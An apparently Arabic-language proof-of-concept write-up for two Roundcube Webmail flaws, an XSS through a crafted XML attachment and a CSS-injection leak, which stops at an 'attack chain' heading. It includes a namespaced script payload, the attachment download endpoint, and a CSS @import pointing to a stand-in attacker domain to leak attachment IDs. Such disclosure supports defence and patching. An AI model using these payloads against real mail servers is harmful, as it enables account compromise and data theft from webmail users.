
إثبات المفهوم لثغرات Roundcube CVE-2024-42008 و CVE-2024-42010
يُظهر إثبات المفهوم (PoC) هذا استغلال ثغرتين أمنيتين في Roundcube Webmail تمكنان من حقن CSS والبرمجة النصية عبر المواقع (XSS). يتكون الهجوم من مرحلتين:
XSS عبر مرفق XML خبيث (CVE-2024-42008)
بسبب عدم كفاية فحوصات رفع الملفات، يمكن إرسال ملف XML كمرفق مع كود JavaScript مثال:
<something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
alert(origin)
</something:script>
كانت هذه مشكلة معروفة وتم تتبعها كـ CVE-2020-13965 وكان التخفيف هو تعطيل خيار "فتح المرفق". لكن لا يزال من الممكن الوصول إلى الملف من خلال نقطة النهاية
https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
حيث UID هو المعرف الفريد لهذا المرفق المعين في صندوق البريد هذا (أي INBOX).

تسريب HTML عبر حقن CSS (CVE-2024-42010)
عند إرسال بريد إلكتروني، من الممكن حقن ملف CSS الخاص بك، عند استضافته في نطاق يبدأ بـ a. من خلال ذلك وملف خادم JavaScript يعالج الطلبات المقدمة من مضيف Roundcube الضعيف، من الممكن استخراج UID لمرفق XSS الخبيث.
استيراد CSS في بريد إلكتروني مرسل باستخدام
<style>
@import "//a.attackerdomain.com/start?"
</style>
استضافة خادم JS (roundcube-css-exploit.js) الذي يسرب UID للمرفق الخبيث

سلسلة الهجوم